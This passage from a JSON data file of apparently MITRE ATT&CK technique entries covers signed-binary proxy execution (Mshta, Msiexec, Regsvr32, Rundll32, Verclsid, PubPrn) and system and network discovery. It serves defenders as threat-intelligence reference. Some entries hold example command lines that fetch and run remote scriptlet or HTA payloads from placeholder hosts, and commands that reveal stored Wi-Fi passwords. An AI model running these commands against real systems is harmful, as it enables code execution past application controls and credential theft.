http[:]//webserver/payload[.]hta</code>\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. <sup>[[LOLBAS Mshta](https://app.tidalcyber.com/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d54c50df-3cb8-4fff-86c4-ae5be57937ad",
"value": "Mshta"
},
{
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).<sup>[[Microsoft msiexec](https://app.tidalcyber.com/references/028a8dc6-08f6-4660-8b82-9d5483d15f72)]</sup> The Msiexec.exe binary may also be digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.<sup>[[LOLBAS Msiexec](https://app.tidalcyber.com/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]</sup><sup>[[TrendMicro Msiexec Feb 2018](https://app.tidalcyber.com/references/768c99f3-ee28-47dc-bc33-06d50ac72dea)]</sup> Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.<sup>[[Microsoft AlwaysInstallElevated 2018](https://app.tidalcyber.com/references/19026f4c-ad65-435e-8c0e-a8ccc9895348)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.007"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "95ea2f53-b6c8-4f85-a3f7-528eeadd3c48",
"value": "Msiexec"
},
{
"description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.<sup>[[Microsoft odbcconf.exe](https://app.tidalcyber.com/references/9df74876-2abf-4ced-b986-36212225d795)]</sup> The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR \"C:\\Users\\Public\\file.dll\"&rbrace;</code>). <sup>[[LOLBAS Odbcconf](https://app.tidalcyber.com/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup><sup>[[TrendMicro Squiblydoo Aug 2017](https://app.tidalcyber.com/references/efeb475c-2a7c-4ab6-814d-3ee7866fa322)]</sup><sup>[[TrendMicro Cobalt Group Nov 2017](https://app.tidalcyber.com/references/81847e06-fea0-4d90-8a9e-5bc99a2bf3f0)]</sup> \n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.008"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ba8d0fed-e500-4060-9d31-277b7e4411fb",
"value": "Odbcconf"
},
{
"description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. <sup>[[MSDN Regsvcs](https://app.tidalcyber.com/references/4f3651df-159e-4006-8cb6-de0d0712a194)]</sup> <sup>[[MSDN Regasm](https://app.tidalcyber.com/references/66a3de54-4a16-4b1b-b18f-e3842aeb7b40)]</sup>\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. <sup>[[LOLBAS Regsvcs](https://app.tidalcyber.com/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup><sup>[[LOLBAS Regasm](https://app.tidalcyber.com/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.009"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "a54c7c35-b70d-42b2-aa9d-5ffd9f792fff",
"value": "Regsvcs/Regasm"
},
{
"description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. <sup>[[Microsoft Regsvr32](https://app.tidalcyber.com/references/723ec577-5ea8-4ced-b6c3-b7aaabe1d7e8)]</sup>\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. <sup>[[LOLBAS Regsvr32](https://app.tidalcyber.com/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup> This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments. <sup>[[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]</sup> <sup>[[FireEye Regsvr32 Targeting Mongolian Gov](https://app.tidalcyber.com/references/d1509d15-04af-46bd-a6b1-30fbd179b257)]</sup>\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://app.tidalcyber.com/technique/3e1ef5ba-6426-4fe0-ad48-78557667d680). <sup>[[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.010"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "b1da2b02-9ade-45e0-a795-ec1b19e5316a",
"value": "Regsvr32"
},
{
"description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://app.tidalcyber.com/technique/8941d1f4-d80c-4aaa-821a-a059c2a0f854)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. <sup>[[Trend Micro CPL](https://app.tidalcyber.com/references/d90a33aa-8f20-49cb-aa27-771249cb65eb)]</sup>\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. <sup>[[This is Security Command Line Confusion](https://app.tidalcyber.com/references/49a21bba-b77d-4b0e-b666-20ef2826e92c)]</sup>\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.<sup>[[Attackify Rundll32.exe Obscurity](https://app.tidalcyber.com/references/daa35853-eb46-4ef4-b543-a2c5157f96bf)]</sup><sup>[[Github NoRunDll](https://app.tidalcyber.com/references/72d4b682-ed19-4e0f-aeff-faa52b3a0439)]</sup> DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).\n\nAdditionally, adversaries may use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.<sup>[[rundll32.exe defense evasion](https://app.tidalcyber.com/references/0f31f0ff-9ddb-4ea9-88d0-7b3b688764af)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.011"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "5652575d-cdb9-44ef-9c32-fff038f15444",
"value": "Rundll32"
},
{
"description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.<sup>[[WinOSBite verclsid.exe](https://app.tidalcyber.com/references/5d5fa25b-64a9-4fdb-87c5-1a69a7d2f874)]</sup>\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.<sup>[[LOLBAS Verclsid](https://app.tidalcyber.com/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup><sup>[[Red Canary Verclsid.exe](https://app.tidalcyber.com/references/f64e934f-737d-4461-8158-ae855bc472c4)]</sup><sup>[[BOHOPS Abusing the COM Registry](https://app.tidalcyber.com/references/3b5c0e62-7ac9-42e1-b2dd-8f2e0739b9d7)]</sup><sup>[[Nick Tyrer GitHub](https://app.tidalcyber.com/references/f4f89926-71eb-4130-a644-8240d2bab721)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.012"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e8eb0242-9972-4c8b-af89-7731065d79f8",
"value": "Verclsid"
},
{
"description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.<sup>[[split man page](https://app.tidalcyber.com/references/3a4dc770-8bfa-44e9-bb0e-f0af0ae92994)]</sup><sup>[[GTFO split](https://app.tidalcyber.com/references/4b86c8c3-57b0-4558-be21-f928acb23f49)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "581c5073-4236-4c45-b8fc-37ae2dfbb65f",
"type": "similar"
},
{
"dest-uuid": "b5c7edc6-0cc7-4c57-b39f-3b0474433889",
"type": "similar"
},
{
"dest-uuid": "b5cc9ab3-6501-4c50-904e-1a25a4088125",
"type": "similar"
},
{
"dest-uuid": "9ca43902-5632-43e9-9dc1-84a8eafe44bd",
"type": "similar"
},
{
"dest-uuid": "766dd13c-6ee1-41da-81cd-a22a27d68103",
"type": "similar"
},
{
"dest-uuid": "43c2f853-cb52-4242-94e9-ec53743f3c05",
"type": "similar"
},
{
"dest-uuid": "d54c50df-3cb8-4fff-86c4-ae5be57937ad",
"type": "similar"
},
{
"dest-uuid": "95ea2f53-b6c8-4f85-a3f7-528eeadd3c48",
"type": "similar"
},
{
"dest-uuid": "ba8d0fed-e500-4060-9d31-277b7e4411fb",
"type": "similar"
},
{
"dest-uuid": "a54c7c35-b70d-42b2-aa9d-5ffd9f792fff",
"type": "similar"
},
{
"dest-uuid": "b1da2b02-9ade-45e0-a795-ec1b19e5316a",
"type": "similar"
},
{
"dest-uuid": "5652575d-cdb9-44ef-9c32-fff038f15444",
"type": "similar"
},
{
"dest-uuid": "e8eb0242-9972-4c8b-af89-7731065d79f8",
"type": "similar"
}
],
"uuid": "4060ad55-7ff1-4127-acad-808b2bc77655",
"value": "System Binary Proxy Execution"
},
{
"description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather detailed system information (e.g. <code>show version</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup> [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.<sup>[[OSX.FairyTale](https://app.tidalcyber.com/references/27f8ad45-53d2-48ba-b549-f7674cf9c2e7)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Google Instances Resource](https://app.tidalcyber.com/references/9733447c-072f-4da8-9cc7-0a0ce6a3b820)]</sup><sup>[[Microsoft Virutal Machine API](https://app.tidalcyber.com/references/f565c237-07c5-4e9e-9879-513627517109)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "a2961a00-450e-45a5-b293-f699d9f3b4ea",
"value": "System Information Discovery"
},
{
"description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.<sup>[[Malware System Language Check](https://app.tidalcyber.com/references/3d4c5366-038a-453e-b803-a172b95da5f7)]</sup>\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) and calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup> \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.<sup>[[Darkside Ransomware Cybereason](https://app.tidalcyber.com/references/eded380e-33e9-4fdc-8e1f-b51d650b9731)]</sup><sup>[[Securelist JSWorm](https://app.tidalcyber.com/references/c29ca9f2-1e48-4913-b10b-15e558868ed8)]</sup><sup>[[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)]</sup>\n\nOn a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1614.001"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "7bebc801-5d5d-44b0-8da2-f37f7d88e40d",
"value": "System Language Discovery"
},
{
"description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup><sup>[[Bleepingcomputer RAT malware 2020](https://app.tidalcyber.com/references/a587ea99-a951-4aa8-a3cf-a4822ae97490)]</sup> Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup> In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.<sup>[[AWS Instance Identity Documents](https://app.tidalcyber.com/references/efff0080-59fc-4ba7-ac91-771358f68405)]</sup><sup>[[Microsoft Azure Instance Metadata 2021](https://app.tidalcyber.com/references/66e93b75-0067-4cdb-b695-8f8109ef26e0)]</sup>\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.<sup>[[Securelist Trasparent Tribe 2020](https://app.tidalcyber.com/references/0db470b1-ab22-4b67-a858-472e4de7c6f0)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
},
{
"dest-uuid": "7bebc801-5d5d-44b0-8da2-f37f7d88e40d",
"type": "similar"
}
],
"uuid": "90e6a093-3e87-4d74-8b68-38c7d7e5e93c",
"value": "System Location Discovery"
},
{
"description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7), <code>tracert</code>, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1016.001"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "3f926f8f-7b47-4a7d-976a-269704a6bc5c",
"value": "Internet Connection Discovery"
},
{
"description": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f), and other discovery or [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) activity to support both ongoing and future campaigns.\n\nAdversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.<sup>[[BleepingComputer Agent Tesla steal wifi passwords](https://app.tidalcyber.com/references/93b5ecd2-35a3-5bd8-9d6e-87bace012546)]</sup><sup>[[Malware Bytes New AgentTesla variant steals WiFi credentials](https://app.tidalcyber.com/references/b61b7db6-ed0d-546d-b1e0-c2630530975b)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup> Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.<sup>[[Binary Defense Emotes Wi-Fi Spreader](https://app.tidalcyber.com/references/05e624ee-c53d-5cd1-8fd2-6b2d38344bfd)]</sup>\n\nOn Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.<sup>[[Wi-Fi Password of All Connected Networks in Windows/Linux](https://app.tidalcyber.com/references/7005f62f-0239-56c7-964b-64384e17b8da)]</sup> On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).<sup>[[Find Wi-Fi Password on Mac](https://app.tidalcyber.com/references/695f3d20-7a46-5a4a-aef0-0a05a5e35304)]</sup>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1016.002"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "4c7c0caa-b9bc-5d63-b5c3-812fdf3bba8a",
"value": "Wi-Fi Discovery"
},
{
"description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e), [ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6)/[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47), [nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e), and [route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af).\n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Mandiant APT41 Global Intrusion ](https://app.tidalcyber.com/references/9b75a38e-e5c7-43c8-a7fb-c7f212e00497)]</sup>\n\nAdversaries may use the information from [System Network Configuration Discovery](https://app.tidalcyber.com/technique/adb6b8c1-2bdb-42b9-95da-5ce07e8796f7) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
},
{
"dest-uuid": "3f926f8f-7b47-4a7d-976a-269704a6bc5c",
"type": "similar"
},
{
"dest-uuid": "4c7c0caa-b9bc-5d63-b5c3-812fdf3bba8a",
"type": "similar"
}
],
"uuid": "adb6b8c1-2bdb-42b9-95da-5ce07e8796f7",
"value": "System Network Configuration Discovery"
},
{
"description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.<sup>[[Amazon AWS VPC Guide](https://app.tidalcyber.com/references/7972332d-fbe9-4f14-9511-4298f65f2a86)]</sup><sup>[[Microsoft Azure Virtual Network Overview](https://app.tidalcyber.com/references/bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615)]</sup><sup>[[Google VPC Overview](https://app.tidalcyber.com/references/9ebe53cf-657f-475d-85e4-9e30f4af1e7d)]</sup> Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491), \"net use,\" and \"net session\" with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc). In Mac and Linux, [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "0d258912-58b1-4982-b90f-eed576f05ffc",
"value": "System Network Connections Discovery"
},
{
"description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://app.tidalcyber.com/technique/86e6f1f0-290b-4971-b50e-80e98a0a768b) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.<sup>[[show_ssh_users_cmd_cisco](https://app.tidalcyber.com/references/11d34884-4559-57ad-8910-54e517c6493e)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "86e6f1f0-290b-4971-b50e-80e98a0a768b",
"value": "System Owner/User Discovery"
},
{
"description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.<sup>[[pubprn](https://app.tidalcyber.com/references/c845c67a-20ab-405c-95fe-2f667f83b886)]</sup>\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.<sup>[[Enigma0x3 PubPrn Bypass](https://app.tidalcyber.com/references/8b12e87b-3836-4c79-877b-0a2761b34533)]</sup> To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).",
"meta": {
